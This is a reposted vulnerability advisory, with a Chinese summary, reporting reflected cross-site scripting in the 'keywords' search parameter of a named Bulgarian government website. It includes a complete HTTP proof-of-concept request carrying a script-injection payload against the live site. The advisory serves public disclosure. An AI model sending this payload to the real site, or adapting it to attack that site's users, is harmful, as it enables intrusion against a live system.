文章描述了ahu.mlsp.government.bg网站存在反射型跨站脚本(XSS)漏洞。攻击者可通过`keywords`参数注入JavaScript代码,并在用户浏览器中执行恶意操作。该漏洞被分类为高危,并附有详细证明概念(PoC)和演示链接。 2026-1-20 21:49:47 Author: cxsecurity.com(查看原文) 阅读量:0 收藏
ahu.mlsp.government.bg-XSS-Reflected-CRITICAL Cross-site scripting## Happy New Year, dear friends. The same case: one year, nobody responds to this report! ## Titles: ahu.mlsp.government.bg-XSS-Reflected-CRITICAL Cross-site scripting (reflected) ## Author: nu11secur1ty ## Date: 1/18/2026 ## Vendor: ahu.mlsp.government.bg ## Software: ahu.mlsp.government.bg ## Reference: https://portswigger.net/web-security/cross-site-scripting ## Description: The value of the `keywords` request parameter is copied into the HTML document as plain text between tags. The payload fpizv<script>alert(1)</script>b6a49ruc4py was submitted in the keywords parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack. STATUS: HIGH- Vulnerability [+]PoC: ``` GET /search/?keywords=fpizv%3cscript%3ealert(1)%3c%2fscript%3eb6a49ruc4py HTTP/1.1 Host: ahu.mlsp.government.bg Cache-Control: max-age=0 Sec-CH-UA: "Chromium";v="143", "Not;A=Brand";v="24", "Google Chrome";v="143" Sec-CH-UA-Mobile: ?0 Sec-CH-UA-Platform: "Windows" Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Connection: close Cookie: JSESSIONID=B73DAEC7FBA9D531A0EA45F18C6A5B19 Origin: null Upgrade-Insecure-Requests: 1 ``` ## Demo PoC: [href](https://www.patreon.com/posts/ahu-mlsp-bg-xss-148520630) ## Time spent: 01:27:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ home page: https://www.asc3t1c-nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <https://nu11secur1ty.blogspot.com/>
Thanks for you comment!
|
{{ x.nick }}
{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1 {{ x.comment }} |
Copyright 2026, cxsecurity.com
如有侵权请联系:admin#unsafe.sh